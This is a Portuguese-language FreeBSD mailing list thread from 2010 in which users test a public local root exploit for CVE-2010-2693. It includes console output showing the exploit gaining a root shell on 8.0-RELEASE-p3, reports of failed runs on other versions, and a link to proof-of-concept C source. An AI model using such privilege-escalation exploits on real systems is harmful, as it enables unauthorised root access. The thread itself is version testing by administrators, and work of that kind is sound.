[FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro

[Nenhum_de_Nos]

On Sun, August 22, 2010 11:46, Leandro Keffer wrote:
> Testado em um 8.0 branch 3 e funcionando : (
>
> FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue
> May 25 20:54:11 UTC 2010
> root em amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC
>  amd64
>
> [keffer em fbsd80 /usr/home/keffer]$ ./cve-2010-2693
> [+] checking for setuid /usr/bin/su binary...
> [+] checking for suitable libc library in /lib...
> [+] found libc at /lib/libc.so.7
> [+] found getuid function at 0x00056990
> [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377
> [+] spawning listener thread...
> [+] connecting to listener thread...
> [+] initiating exploit via sendfile...
> [+] exploit complete!
> [+] spawning root shell...
> fbsd80# id
> uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

aqui parece num funcionar, e ainda pede senha no final ... (do su)

[matheus em lamneth /usr/home/matheus/temp/exploits]$ ./cve-2010-2693
[+] checking for setuid /usr/bin/su binary...
[+] checking for suitable libc library in /lib...
[+] found libc at /lib/libc.so.6
[+] found getuid function at 0x0005a168
[+] target: 0x0005a168, adjusted: 0x00059968, writes: 1433
[+] spawning listener thread...
[+] connecting to listener thread...
[+] initiating exploit via sendfile...

[+] exploit complete!
[+] spawning root shell...
Password:
su: Sorry
[matheus em lamneth /usr/home/matheus/temp/exploits]$ ./cve-2010-2693
[+] checking for setuid /usr/bin/su binary...
[+] checking for suitable libc library in /lib...
[+] found libc at /lib/libc.so.6
[+] found getuid function at 0x0005a168
[+] target: 0x0005a168, adjusted: 0x00059968, writes: 1433
[+] spawning listener thread...
[-] couldn't bind to listener socket

FreeBSD lamneth 8.0-BETA3 FreeBSD 8.0-BETA3 #0: Thu Aug 27 01:06:32 BRT
2009    
root em lamneth:/usr/obj/usr/home/matheus/public_html/FreeBSD/csup/CURRENT/src/sys/Lamneth8
 i386

curioso :)

matheus

> Em 21 de agosto de 2010 11:44, Anderson Eduardo
> <listas em secover.com.br>escreveu:
>
>> Em 21/8/2010 11:42, Nilson escreveu:
>> > Em 21 de agosto de 2010 11:17, Leandro Keffer<keffer666 em gmail.com>
>>  escreveu:
>> >> Será que ataca 8.0 com ultimo branch tambem ??
>> >> Alguem disposto a testar ?? estou sem acesso a servidores free nesse
>> momento
>> >>
>> >> T+ pessoal
>> >>
>> >
>> > Acabei de testar num 8.0-RELEASE-p2 e funcionou, no 8.1-STABLE
>> (cvsupado
>> semana
>> > passada) não funcionou.
>> >
>> >
>> > -
>> > Nilson
>> > -------------------------
>> > Histórico: http://www.fug.com.br/historico/html/freebsd/
>> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>>
>> Outro PoC - http://jon.oberheide.org/files/cve-2010-2693.c
>>
>> Esse é melhor.
>> -------------------------
>> Histórico: http://www.fug.com.br/historico/html/freebsd/
>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>>
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>


-- 
We will call you cygnus,
The God of balance you shall be

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?

http://en.wikipedia.org/wiki/Posting_style